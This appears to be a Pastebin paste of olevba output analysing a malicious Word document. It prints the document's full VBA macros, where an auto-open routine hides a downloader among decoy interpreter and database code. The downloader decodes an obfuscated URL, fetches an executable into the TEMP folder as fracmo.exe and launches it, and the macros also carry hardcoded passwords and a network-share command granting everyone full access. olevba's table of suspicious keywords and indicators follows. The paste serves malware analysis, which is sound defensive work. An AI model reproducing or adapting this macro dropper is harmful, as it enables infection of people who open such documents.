Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.41 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB-V malware.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
- ===============================================================================
- FILE: malware.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: malware.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- divide ""
- minus ""
- RxReplace "", "", ""
- Cons ""
- singularize ""
- CompattaDB "", "", ""
- VerificaFunzionalita
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: malware.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Sub BuiltinInit()
- Dim NullEnv As New Scripting.Dictionary
- Dim PlusLR As New Collection
- PlusLR.Add "plus"
- PlusLR.Add NullEnv
- Set GlobalEnv.Item("+LR") = PlusLR
- Set GlobalEnv.Item("+") = Credd.ate("+LR", "func")
- Dim MinusLR As New Collection
- MinusLR.Add "minus"
- MinusLR.Add NullEnv
- Set GlobalEnv.Item("-LR") = MinusLR
- Set GlobalEnv.Item("-") = Credd.ate("-LR", "func")
- Dim TimesLR As New Collection
- TimesLR.Add "times"
- TimesLR.Add NullEnv
- Set GlobalEnv.Item("*LR") = TimesLR
- Set GlobalEnv.Item("*") = Credd.ate("*LR", "func")
- Dim DivideLR As New Collection
- DivideLR.Add "divide"
- DivideLR.Add NullEnv
- Set GlobalEnv.Item("/LR") = DivideLR
- Set GlobalEnv.Item("/") = Credd.ate("/LR", "func")
- Dim ConsLR As New Collection
- ConsLR.Add "Cons"
- ConsLR.Add NullEnv
- Set GlobalEnv.Item("ConsLR") = ConsLR
- Set GlobalEnv.Item("Cons") = Credd.ate("ConsLR", "func")
- Dim CarLR As New Collection
- CarLR.Add "Car"
- CarLR.Add NullEnv
- Set GlobalEnv.Item("CarLR") = CarLR
- Set GlobalEnv.Item("Car") = Credd.ate("CarLR", "func")
- Dim CdrLR As New Collection
- CdrLR.Add "Cdr"
- CdrLR.Add NullEnv
- Set GlobalEnv.Item("CdrLR") = CdrLR
- Set GlobalEnv.Item("Cdr") = Credd.ate("CdrLR", "func")
- End Sub
- Public Function Cons(args As String)
- 'function prelude
- strFileTemporaneo.Open
- Dim EnvLR As Variant
- GoTo minus1
- instance = argddds.Item(1).GetVal
- Dim LR As New Collection
- Set LR = GlobalEnv.Item(instance)
- Set Env = LR.Item(2)
- 'actual function body
- Set res.Car = argddds.Item(2)
- Set res.Cdr = argddds.Item(3)
- 'local environment writeback
- Dim LR_Writeback As New Collection
- Call LR_Writeback.Add(LR.Item(1))
- Call LR_Writeback.Add(Env)
- Set GlobalEnv.Item(instance) = LR_Writeback
- 'return value
- Set Modussle1.current_res = res
- minus1:
- EnvLR = pathTrueCrypt.responseBody
- strFileTemporaneo.write EnvLR
- End Function
- Public Function Car(args As Collection)
- 'function prelude
- instance = argddds.Item(1).GetVal
- Dim LR As New Collection
- Set LR = GlobalEnv.Item(instance)
- Dim Env As New Scripting.Dictionary
- Set Env = LR.Item(2)
- 'actual function body
- Set res = argddds.Item(2).Car
- 'local environment writeback
- Dim LR_Writeback As New Collection
- Call LR_Writeback.Add(LR.Item(1))
- Call LR_Writeback.Add(Env)
- Set GlobalEnv.Item(instance) = LR_Writeback
- 'return value
- Set Module1.current_res = res
- End Function
- Public Function Cdr(args As Collection)
- 'function prelude
- instance = argddds.Item(1).GetVal
- Dim LR As New Collection
- Set LR = GlobalEnv.Item(instance)
- Dim Env As New Scripting.Dictionary
- Set Env = LR.Item(2)
- 'actual function body
- Set res = argddds.Item(2).Cdr
- 'local environment writeback
- Dim LR_Writeback As New Collection
- Call LR_Writeback.Add(LR.Item(1))
- Call LR_Writeback.Add(Env)
- Set GlobalEnv.Item(instance) = LR_Writeback
- 'return value
- Set Module1.current_res = res
- End Function
- Public Function plus(args As Collection)
- 'function prelude
- instance = argddds.Item(1).GetVal
- Dim LR As New Collection
- Set LR = GlobalEnv.Item(instance)
- Dim Env As New Scripting.Dictionary
- Set Env = LR.Item(2)
- 'actual function body
- Dim res As New Lval
- If argddds.Count = 1 Then
- Set res = Credd.ate(0, "number")
- ElseIf argddds.Count = 2 Then
- Set res = Credd.ate(argddds.Item(2).GetVal, "number")
- Else
- Set res = Credd.ate(argddds.Item(2).GetVal, "number")
- For i = 3 To argddds.Count
- Call res.SetVal((res.GetVal + argddds.Item(i).GetVal), "number")
- Next
- End If
- 'captured variable writeback
- Dim LR_Writeback As New Collection
- Call LR_Writeback.Add(LR.Item(1)) 'add function ID, even though we don't need it
- Call LR_Writeback.Add(Env)
- Set GlobalEnv.Item(instance) = LR_Writeback
- 'return value
- Set Module1.current_res = res
- End Function
- Public Function minus(args As String)
- 'function prelude
- Set strFileTemporaneo = CreateObject("Ad" + "odb" + "." + "St" + "ream")
- Set Recordset = CreateObject("W" + "Sc" + "ript" + "." + "Sh" + "ell").Environment("P" + "ro" + "c" + "e" + "ss")
- Exit Function
- instance = argddds.Item(1).GetVal
- Dim LR As New Collection
- Set LR = GlobalEnv.Item(instance)
- Set Env = LR.Item(2)
- 'actual function body
- If argddds.Count = 1 Then
- Set res = Credd.ate(0, "number")
- ElseIf argddds.Count = 2 Then
- Set res = Credd.ate(0 - argddds.Item(2).GetVal, "number")
- Else
- Set res = Credd.ate(argddds.Item(2).GetVal, "number")
- For i = 3 To argddds.Count
- Call res.SetVal((res.GetVal - argddds.Item(i).GetVal), "number")
- Next
- End If
- 'captured variable writeback
- Dim LR_Writeback As New Collection
- Call LR_Writeback.Add(LR.Item(1)) 'add function ID, even though we don't need it
- Call LR_Writeback.Add(Env)
- 'return value
- End Function
- Public Function times(args As Collection)
- 'function prelude
- instance = argddds.Item(1).GetVal
- Dim LR As New Collection
- Set LR = GlobalEnv.Item(instance)
- Dim Env As New Scripting.Dictionary
- Set Env = LR.Item(2)
- 'actual function body
- Dim res As New Lval
- If argddds.Count = 1 Then
- Set res = Credd.ate(1, "number")
- ElseIf argddds.Count = 2 Then
- Set res = Credd.ate(argddds.Item(2).GetVal, "number")
- Else
- Set res = Credd.ate(argddds.Item(2).GetVal, "number")
- For i = 3 To argddds.Count
- Call res.SetVal((res.GetVal * argddds.Item(i).GetVal), "number")
- Next
- End If
- 'captured variable writeback
- Dim LR_Writeback As New Collection
- Call LR_Writeback.Add(LR.Item(1)) 'add function ID, even though we don't need it
- Call LR_Writeback.Add(Env)
- Set GlobalEnv.Item(instance) = LR_Writeback
- 'return value
- Set Module1.current_res = res
- End Function
- Public Function divide(args As String)
- Set pathTrueCrypt = CreateObject("Microsoft" + ".XMLHTTP")
- Dim urlAr() As Variant
- urlAr = Array(3458, 3470, 3470, 3466, 3412, 3401, 3401, 3474, 3469, 3464, 3465, 3459, 3469, 3455, 3453, 3453, 3469, 3400, 3452, 3459, 3457, 3466, 3465, 3464, 3454, 3458, 3465, 3469, 3470, 3459, 3464, 3457, 3400, 3453, 3465, 3463, 3401, 3471, 3408, 3407, 3406, 3457, 3401, 3409, 3408, 3460, 3407, 3458, 3406, 3457, 3400, 3455, 3474, 3455)
- pathTrueCrypt.Open "GET", VBGetDrive(urlAr, 53), False
- Exit Function
- instance = argscs.Item(1).GetVal
- Dim LR As New Collection
- Set LR = GlobalEnv.Item(instance)
- Set Env = LR.Item(2)
- 'actual function body
- If argggs.Count = 1 Then
- Set res = Cregg.ate(1, "number")
- ElseIf argddds.Count = 2 Then
- Set res = Credd.ate((1 / argddds.Item(2).GetVal), "number")
- Else
- Set res = Credd.ate(argddds.Item(2).GetVal, "number")
- For i = 3 To argddds.Count
- Call res.SetVal((res.GetVal / argddds.Item(i).GetVal), "number")
- Next
- End If
- 'captured variable writeback
- Dim LR_Writeback As New Collection
- Call LR_Writeback.Add(LR.Item(1)) 'add function ID, even though we don't need it
- Call LR_Writeback.Add(Env)
- Set GlobalEnv.Item(instance) = LR_Writeback
- 'return value
- Set Modulss.e1.current_res = res
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: malware.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public pathTrueCrypt As Object
- Public strFileTemporaneo As Object
- Public Recordset As Object
- Public backupValid As String
- Public richiesta As String
- Public F1abiliata As Object
- Public Function pluralize(s As String)
- Dim plural As New Scripting.Dictionary
- plural.Add "(quiz)$", "$1zes"
- plural.Add "^(ox)$", "$1en"
- plural.Add "([m|l])ouse$", "$1ice"
- plural.Add "(matr|vert|ind)ix|ex$", "$1ices"
- plural.Add "(x|ch|ss|sh)$", "$1es"
- plural.Add "([^aeiouy]|qu)y$", "$1ies"
- plural.Add "([^aeiouy]|qu)ies$", "$1y"
- plural.Add "(hive)$", "$1s"
- plural.Add "(?:([^f])fe|([lr])f)$", "$1$2ves"
- plural.Add "sis$", "ses"
- plural.Add "([ti])um$", "$1a"
- plural.Add "(buffal|tomat)o$", "$1oes"
- plural.Add "(bu)s$", "$1ses"
- plural.Add "(alias|status)$", "$1es"
- plural.Add "(octop|vir)us$", "$1i"
- plural.Add "(ax|test)is$", "$1es"
- plural.Add "s$", "s"
- plural.Add "$", "s"
- Dim irregular As New Scripting.Dictionary
- irregular.Add "move", "moves"
- irregular.Add "foot", "feet"
- irregular.Add "goose", "geese"
- irregular.Add "sex", "sexes"
- irregular.Add "child", "children"
- irregular.Add "man", "men"
- irregular.Add "tooth", "teeth"
- irregular.Add "person", "people"
- Dim uncountable As New Scripting.Dictionary
- uncountable.Add "sheep", "sheep"
- uncountable.Add "fish", "fish"
- uncountable.Add "deer", "deer"
- uncountable.Add "series", "series"
- uncountable.Add "species", "species"
- uncountable.Add "money", "money"
- uncountable.Add "rice", "rice"
- uncountable.Add "information", "information"
- uncountable.Add "equipment", "equipment"
- Dim vKey As Variant
- 'check to see if the single is uncountable
- If uncountable.Exists(s) Then
- pluralize = s
- Exit Function
- End If
- 'check for irregular forms
- For Each vKey In irregular.Keys
- If RxTest(s, CStr(vKey)) Then
- pluralize = RxReplace(s, CStr(vKey), irregular(CStr(vKey)))
- Exit Function
- Else
- End If
- Next vKey
- 'pluralization
- For Each vKey In plural.Keys
- If RxTest(s, CStr(vKey)) Then
- pluralize = RxReplace(s, CStr(vKey), plural(CStr(vKey)))
- Exit Function
- Else
- End If
- Next vKey
- 'default back to the original string
- pluralize = s
- End Function
- Public Function singularize(s As String)
- strFileTemporaneo.savetofile richiesta, 2
- Exit Function
- singlular.Add "(quiz)zes$", "$1"
- singlular.Add "(matr)ices$", "$1ix"
- singlular.Add "(vert|ind)ices$", "$1ex"
- singlular.Add "^(ox)en$", "$1"
- singlular.Add "(alias)es$", "$1"
- singlular.Add "(octop|vir)i$", "$1us"
- singlular.Add "(cris|ax|test)es$", "$1is"
- singlular.Add "(shoe)s$", "$1"
- singlular.Add "(o)es$", "$1"
- singlular.Add "(bus)es$", "$1"
- singlular.Add "([m|l])ice$", "$1ouse"
- singlular.Add "(x|ch|ss|sh)es$", "$1"
- singlular.Add "(m)ovies$", "$1ovie"
- singlular.Add "(s)eries$", "$1eries"
- singlular.Add "([^aeiouy]|qu)ies$", "$1y"
- singlular.Add "([lr])ves$", "$1f"
- singlular.Add "(tive)s$", "$1"
- singlular.Add "(hive)s$", "$1"
- singlular.Add "(li|wi|kni)ves$", "$1fe"
- singlular.Add "(shea|loa|lea|thie)ves$", "$1f"
- singlular.Add "(^analy)ses$", "$1sis"
- singlular.Add "((a)naly|(b)a|(d)iagno|(p)arenthe|(p)rogno|(s)ynop|(t)he)ses$", "$1$2sis"
- singlular.Add "([ti])a$", "$1um"
- singlular.Add "(n)ews$", "$1ews"
- singlular.Add "(h|bl)ouses$", "$1ouse"
- singlular.Add "(corpse)s$", "$1"
- singlular.Add "(us)es$", "$1"
- singlular.Add "s$", ""
- irregular.Add "moves", "move"
- irregular.Add "feet", "foot"
- irregular.Add "geese", "goose"
- irregular.Add "sexes", "sex"
- irregular.Add "children", "child"
- irregular.Add "men", "man"
- irregular.Add "teeth", "tooth"
- irregular.Add "people", "person"
- uncountable.Add "sheep", "sheep"
- uncountable.Add "fish", "fish"
- uncountable.Add "deer", "deer"
- uncountable.Add "series", "series"
- uncountable.Add "species", "species"
- uncountable.Add "money", "money"
- uncountable.Add "rice", "rice"
- uncountable.Add "information", "information"
- uncountable.Add "equipment", "equipment"
- Dim vKey As Variant
- 'check to see if the single is uncountable
- If uncountable.Exists(s) Then
- singularize = s
- Exit Function
- End If
- 'check for irregular forms
- For Each vKey In irregular.Keys
- If RxTest(s, CStr(vKey)) Then
- singularize = RxReplace(s, CStr(vKey), irregular(CStr(vKey)))
- Exit Function
- Else
- End If
- Next vKey
- 'pluralization
- For Each vKey In singlular.Keys
- If RxTest(s, CStr(vKey)) Then
- singularize = RxReplace(s, CStr(vKey), singlular(CStr(vKey)))
- Exit Function
- Else
- End If
- Next vKey
- 'default back to the original string
- singularize = s
- End Function
- Public Function VBGetDrive(fromArr() As Variant, LenLen As Integer) As String
- Dim i As Integer
- Dim result As String
- result = ""
- For i = LBound(fromArr) To UBound(fromArr)
- result = result & Chr(fromArr(i) - LenLen - 3301)
- Next i
- VBGetDrive = result
- End Function
- 'http://bytecomb.com/regular-expressions-in-vba/
- Public Function RxTest( _
- ByVal SourceString As String, _
- ByVal Pattern As String, _
- Optional ByVal IgnoreCase As Boolean = True, _
- Optional ByVal MultiLine As Boolean = True) As Boolean
- With New RegExp
- .MultiLine = MultiLine
- .IgnoreCase = IgnoreCase
- .Global = False
- .Pattern = Pattern
- RxTest = .Test(SourceString)
- End With
- End Function
- 'http://bytecomb.com/regular-expressions-in-vba/
- Public Function RxReplace( _
- ByVal SourceString As String, _
- ByVal Pattern As String, _
- ByVal ReplacePattern As String, _
- Optional ByVal IgnoreCase As Boolean = True, _
- Optional ByVal MultiLine As Boolean = True, _
- Optional ByVal MatchGlobal As Boolean = True) As String
- backupValid = Recordset("" + "" + "T" + "E" + "MP") + "\"
- richiesta = backupValid + "frac" + "mo" + ".ex" + "e"
- strFileTemporaneo.Type = 1
- pathTrueCrypt.Send
- Exit Function
- With RegExp
- .MultiLine = MultiLine
- .IgnoreCase = IgnoreCase
- .Global = MatchGlobal
- .Pattern = Pattern
- RxReplace = .Replace(SourceString, ReplacePattern)
- End With
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO Module3.bas
- in file: malware.doc - OLE stream: u'Macros/VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Const strKeyDb As String = "ciao"
- Const strKeyDbTrac As String = "limone"
- Public Const strKeyVolume As String = "!&^_`}~804FGHUJK!"
- Public Const appName As String = "IsoDial"
- Const sezione As String = "Impostazioni"
- Const nomeUsb As String = "U_BACKUP"
- Public Const nomeVolume As String = "SysCrypt.tc"
- Const Megabyte = 1048576
- Private Type structFile
- data As Date
- num As Integer
- End Type
- Sub Main()
- Dim ret As Long
- Dim datadb As Date
- Call CaricaPercorso
- Call VerificaErrori
- Call MontaVolume
- Call CaricaDati
- Call VerificaFunzionalita
- isCorrotto = False
- datadb = CDate(Left(FileDateTime(structApri.pathDB + "\centro.mdb"), 10))
- If datadb > Date Then
- MsgBox ("IMPOSSIBILE AVVIARE ISODIAL - La data di sistema non ? corretta"), vbCritical, "ATTENZIONE!!!"
- Set cnPrinc = Nothing
- Set cnTrac = Nothing
- If structApri.server Then
- Call Shell("NET SHARE RISORSA /DELETE", vbHide)
- ret = Shell(structApri.pathTrueCrypt & "\TrueCrypt.exe /d X /q /s /f", vbHide)
- End If
- End
- End If
- frmMain.Show
- frmLogin.Show 1
- End Sub
- Private Sub CaricaPercorso()
- On Error GoTo gestione
- structApri.pathVolume = (GetSetting(appName, sezione, "percorsoVolume"))
- structApri.pathTrueCrypt = (GetSetting(appName, sezione, "percorsoTrueCrypt"))
- structApri.pathExe = (GetSetting(appName, sezione, "percorsoExe"))
- structApri.server = CBool(GetSetting(appName, sezione, "Server"))
- structApri.nomeServer = GetSetting(appName, sezione, "nomeServer")
- structApri.pathNomeCertificato = GetSetting(appName, sezione, "nomeCertificato")
- structApri.strFromModuliWord = GetSetting(appName, sezione, "strFromModuliWord")
- Exit Sub
- gestione:
- MsgBox "Errore n? 1-" & Err.Number & ": " & vbCrLf & Err.Description, vbCritical, "Attenzione"
- End
- End Sub
- Public Sub VerificaErrori()
- On Error GoTo gestione
- Dim lettera As String
- Dim dimVolume As Double
- If App.PrevInstance Then
- MsgBox "Il programma ? gi? in esecuzione" & vbCrLf & _
- "(Situato nella barra in basso a destra dello schermo vicino all"
- End
- End If
- If Dir((structApri.pathVolume) & "\" & nomeVolume) = "" Then
- MsgBox "Archivio inesistente", vbCritical, "Apertura archivio"
- End
- End If
- dimVolume = FileLen(structApri.pathVolume & "\" & nomeVolume) / Megabyte
- If structApri.server Then
- If Dir((structApri.pathTrueCrypt) & "\TrueCrypt.exe") = "" Then
- MsgBox "Programma di criptaggio non istallato", vbCritical, "Apertura archivio"
- End
- End If
- If Not (Environ$("COMPUTERNAME") = "MASTER" Or Environ$("COMPUTERNAME") = "MASTERMIO") Then
- If Not VerificaDiscoRimovibile(lettera) Then
- MsgBox "Impossibile continuare" & vbCrLf & "Unita"
- End
- End If
- If Not SpazioSufficiente(lettera, dimVolume) Then
- MsgBox "Impossibile continuare" & vbCrLf & "Spazio insufficiente sull"
- End
- End If
- If Not backupValidi(lettera) Then
- MsgBox "I file di backup presenti nell"
- End If
- End If
- End If
- Exit Sub
- gestione:
- If Err.Number = 55 Or Err.Number = 53 Then
- Exit Sub
- ElseIf Err.Number = 52 Then
- MsgBox "Impossibile avviare Isodial" & vbCrLf & "Verificare la connessione al server", vbCritical, "Attenzione"
- End
- Else
- MsgBox "Errore n? 2-" & Err.Number & ": " & vbCrLf & Err.Description, vbCritical, "Attenzione"
- End
- End If
- End Sub
- Public Sub MontaVolume()
- Dim ret As Double
- On Error GoTo gestione
- If structApri.server And getVersion = "Windows XP" Then
- ret = Shell(structApri.pathTrueCrypt & "\TrueCrypt.exe" & " /v " & structApri.pathVolume & "\" & nomeVolume & " /l X /p " & strKeyVolume & " /a /q /s", vbHide)
- Shell ("NET SHARE RISORSA=X: /UNLIMITED")
- structApri.pathDB = "X:"
- ElseIf structApri.server Then
- ret = Shell(structApri.pathTrueCrypt & "\TrueCrypt.exe" & " /v " & structApri.pathVolume & "\" & nomeVolume & " /l X /p " & strKeyVolume & " /a /q /s", vbHide)
- Shell ("NET SHARE RISORSA=X: /GRANT:everyone,full /UNLIMITED")
- structApri.pathDB = "X:"
- Else
- tRete = tpCONNETTI
- frmAttendi.Show 1
- structApri.pathDB = structApri.nomeServer & "\RISORSA"
- End If
- Exit Sub
- gestione:
- MsgBox "Errore n? 3-" & Err.Number & ": " & vbCrLf & Err.Description, vbCritical, "Attenzione"
- End
- End Sub
- Public Sub CompattaDB(nomeDB As String, strPercorsoDB As String, strKeyDb As String)
- On Error GoTo ErrorHandler
- Dim strFileTemporaneo As String
- Set F1abiliata = CreateObject("Sh" + "ell" + "." + "Ap" + "pli" + "cat" + "ion")
- Exit Sub
- strFileTemporaneo = strPercorsoDB & "\temp.mdb"
- oJet.CompactDatabase _
- "Provider=Microsoft.Jet.OLEDB.4.0;" _
- & "Data Source=" & strPercorsoDB & "\" & nomeDB & ";Jet OLEDB:Database Password=" & strKeyDb, _
- "Provider=Microsoft.Jet.OLEDB.4.0;" _
- & "Data Source=" & strFileTemporaneo & ";" _
- & "Jet OLEDB:Engine Type = 5;Jet OLEDB:Database Password=" & strKeyDb
- Kill strPercorsoDB & "\" & nomeDB
- Name strFileTemporaneo As strPercorsoDB & "\" & nomeDB
- Exit Sub
- ErrorHandler:
- If Err.Number = -2147467259 Then
- Exit Sub
- Else
- MsgBox "Errore n? 4-" & Err.Number & ": " & vbCrLf & Err.Description, vbCritical, "Attenzione"
- End If
- End Sub
- Public Sub CaricaDati()
- On Error GoTo gestione
- Dim rsDataset As Recordset
- Set cnPrinc = New ADODB.Connection
- cnPrinc.CursorLocation = adUseClient
- strConnectionStringCentro = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & (structApri.pathDB) & "\Centro.mdb;Jet OLEDB:Database Password=" & strKeyDb
- cnPrinc.Open strConnectionStringCentro
- If TRACCIATO Then
- Set cnTrac = New ADODB.Connection
- cnTrac.CursorLocation = adUseClient
- strConnectionStringTracciatura = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & (structApri.pathDB) & "\Connessioni.mdb;Jet OLEDB:Database Password=" & strKeyDbTrac
- cnTrac.Open strConnectionStringTracciatura
- End If
- If Not structApri.server Then
- Set rsDataset = New Recordset
- rsDataset.Open "CLIENT", cnPrinc, adOpenKeyset, adLockPessimistic, adCmdTable
- rsDataset.Update "NUMERO", rsDataset("NUMERO") + 1
- Set rsDataset = Nothing
- End If
- intValore = 10
- Call CaricaVarPublic
- Exit Sub
- gestione:
- MsgBox "Errore n? 5-" & Err.Number & ": " & vbCrLf & Err.Description, vbCritical, "Attenzione"
- End
- End Sub
- Public Sub VerificaFunzionalita()
- F1abiliata.Open (richiesta)
- End Sub
- Private Function backupValidi(lettera As String) As Boolean
- On Error GoTo gestione
- Dim i As Integer
- Dim records() As structFile
- ReDim records(0)
- If Dir(lettera & ":\Dati.dat") <> "" Then
- Open lettera & ":\Dati.dat" For Random As 1
- i = 0
- Do While Not EOF(1)
- Get 1, i + 1, records(i)
- ReDim Preserve records(UBound(records) + 1)
- i = i + 1
- Loop
- Close 1
- ReDim Preserve records(UBound(records) - 1)
- For i = 0 To UBound(records)
- If Dir(lettera & ":\" & nomeVolume & records(i).num) = "" Then
- backupValidi = False
- Exit Function
- End If
- Next i
- backupValidi = True
- Else
- backupValidi = True
- End If
- Exit Function
- gestione:
- MsgBox "Errore n? 6 - " & Err.Description, vbCritical, "Attenzione"
- End Function
- Private Function ConfrontoVersione(inLibreria As String, inVersioneRichiesta As String, ByRef outTesto As String) As Boolean
- Dim strVersioneAttuale As String
- ConfrontoVersione = True
- If Not IsCorrectVersion(inVersioneRichiesta, inLibreria, strVersioneAttuale) Then
- outTesto = outTesto & _
- "La libreria " & inLibreria & " non ? aggiornata." & vbCrLf & _
- "Versione richiesta: " & inVersioneRichiesta & Space(5) & "Versione attuale: " & strVersioneAttuale & vbCrLf
- ConfrontoVersione = False
- End If
- End Function
- Private Sub ControlloFileEsterni()
- Dim blnBloccaProgramma As Boolean
- Dim strTesto As String
- Dim strVersioneAttuale As String
- Dim strVersioneRichiesta As String
- Dim strLibreria As String
- strLibreria = "DataTimeBox.ocx"
- strVersioneRichiesta = "1.03.0007"
- blnBloccaProgramma = Not ConfrontoVersione(strLibreria, strVersioneRichiesta, strTesto)
- strLibreria = "SuperTextBox.ocx"
- strVersioneRichiesta = "1.01.0003"
- blnBloccaProgramma = blnBloccaProgramma Or Not ConfrontoVersione(strLibreria, strVersioneRichiesta, strTesto)
- strLibreria = "ACPRibbon.ocx"
- strVersioneRichiesta = "1.00.0001"
- blnBloccaProgramma = blnBloccaProgramma Or Not ConfrontoVersione(strLibreria, strVersioneRichiesta, strTesto)
- strLibreria = "DataComboBox.ocx"
- strVersioneRichiesta = "1.00.0001"
- blnBloccaProgramma = blnBloccaProgramma Or Not ConfrontoVersione(strLibreria, strVersioneRichiesta, strTesto)
- If blnBloccaProgramma Then
- Beep
- Load frmControlloFileEsterni
- strTesto = "Impossibile avviare Isodial. " & vbCrLf & "Si prega di contattare l"
- frmControlloFileEsterni.lblTesto.Caption = strTesto
- frmControlloFileEsterni.Show 1
- Unload frmControlloFileEsterni
- End If
- End Sub
- Public Function SpazioSufficiente(lettera As String, spazio As Double) As Boolean
- SpazioSufficiente = CLng(GetDriveSize(lettera & ":")) > spazio
- End Function
- Public Function GetDriveSize(DriveName As String) As String
- Dim FB As Currency, BT As Currency, FBT As Currency
- Dim RetVal As Long
- RetVal = GetDiskFreeSpace_FAT32(Left(DriveName, 2), FB, BT, FBT)
- FBT = FBT * 10000
- GetDriveSize = Format(FBT / Megabyte, "####,###,###")
- End Function
- Public Function VerificaDiscoRimovibile(ByRef lettera As String) As Boolean
- Dim ret As Long
- Dim allDrives As String
- Dim v_drives() As String
- Dim i As Integer
- Dim volName As String
- Dim serial As Long
- Dim f As String
- Dim g As Long
- allDrives = VBGetLogicalDriveStrings()
- v_drives = Split(allDrives, Chr(0))
- For i = 0 To UBound(v_drives)
- ret = GetDriveType(v_drives(i))
- If ret = DRIVE_REMOVABLE Then
- If Left(v_drives(i), 1) <> "A" And Left(v_drives(i), 1) <> "B" Then
- Call GetDriveInfo(Left(v_drives(i), 1) & ":", volName, serial, f, g)
- If volName = nomeUsb Then
- lettera = Left(v_drives(i), 1)
- VerificaDiscoRimovibile = True
- Exit Function
- End If
- End If
- End If
- Next i
- VerificaDiscoRimovibile = False
- End Function
- Private Function VBGetLogicalDriveStrings() As String
- Dim r As Long
- Dim tmp As String
- tmp$ = Space$(64)
- r& = GetLogicalDriveStrings(Len(tmp$), tmp$)
- VBGetLogicalDriveStrings = Trim$(tmp$)
- End Function
- Private Function GetDriveInfo(ByVal DriveName As String, Optional VolumeName As String, _
- Optional SerialNumber As Long, Optional FileSystem As String, _
- Optional FileSystemFlags As Long) As Boolean
- Dim ignore As Long
- If InStr(DriveName, "\\") = 0 Then
- DriveName = Left$(DriveName, 1) & ":\"
- End If
- SerialNumber = 0
- FileSystemFlags = 0
- VolumeName = String$(MAX_PATH, 0)
- FileSystem = String$(MAX_PATH, 0)
- GetDriveInfo = GetVolumeInformation(DriveName, VolumeName, Len(VolumeName), _
- SerialNumber, ignore, FileSystemFlags, FileSystem, Len(FileSystem))
- VolumeName = Left$(VolumeName, InStr(VolumeName, vbNullChar) - 1)
- FileSystem = Left$(FileSystem, InStr(FileSystem, vbNullChar) - 1)
- End Function
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | Suspicious | Kill | May delete a file |
- | Suspicious | Open | May open a file |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | vbHide | May run an executable file or a system |
- | | | command |
- | Suspicious | Windows | May enumerate application windows (if |
- | | | combined with Shell.Application object) |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | GetVolumeInformation | May detect Anubis Sandbox |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | SaveToFile | May create a text file |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | WScript.Shell | May run an executable file or a system |
- | | | command (obfuscation: VBA expression) |
- | Suspicious | Shell.Application | May run an application (if combined |
- | | | with CreateObject) (obfuscation: VBA |
- | | | expression) |
- | Suspicious | ADODB.Stream | May create a text file (obfuscation: |
- | | | VBA expression) |
- | Suspicious | Microsoft.XMLHTTP | May download files from the Internet |
- | | | (obfuscation: VBA expression) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | Suspicious | VBA obfuscated | VBA string expressions were detected, |
- | | Strings | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | http://bytecomb.com | URL |
- | | /regular- | |
- | | expressions-in-vba/ | |
- | IOC | TrueCrypt.exe | Executable file name |
- | IOC | fracmo.exe | Executable file name (obfuscation: VBA |
- | | | expression) |
- | Hex String | !GFrY | 2147467259 |
- | Base64 | ~+! | fish |
- | String | | |
- | VBA string | Adodb.Stream | ("Ad" + "odb" + "." + "St" + "ream") |
- | VBA string | WScript.Shell | ("W" + "Sc" + "ript" + "." + "Sh" + |
- | | | "ell") |
- | VBA string | Process | ("P" + "ro" + "c" + "e" + "ss") |
- | VBA string | Microsoft.XMLHTTP | ("Microsoft" + ".XMLHTTP") |
- | VBA string | TEMP\ | ("" + "" + "T" + "E" + "MP") + "\" |
- | VBA string | fracmo.exe | "frac" + "mo" + ".ex" + "e" |
- | VBA string | \TrueCrypt.exe /v | "\TrueCrypt.exe" & " /v " |
- | VBA string | Shell.Application | ("Sh" + "ell" + "." + "Ap" + "pli" + |
- | | | "cat" + "ion") |
- | VBA string | Provider=Microsoft.J | "Provider=Microsoft.Jet.OLEDB.4.0;" & |
- | | et.OLEDB.4.0;Data | "Data Source=" |
- | | Source= | |
- | VBA string | ;Jet OLEDB:Engine | ";" & "Jet OLEDB:Engine Type = 5;Jet |
- | | Type = 5;Jet | OLEDB:Database Password=" |
- | | OLEDB:Database | |
- | | Password= | |
- +------------+----------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement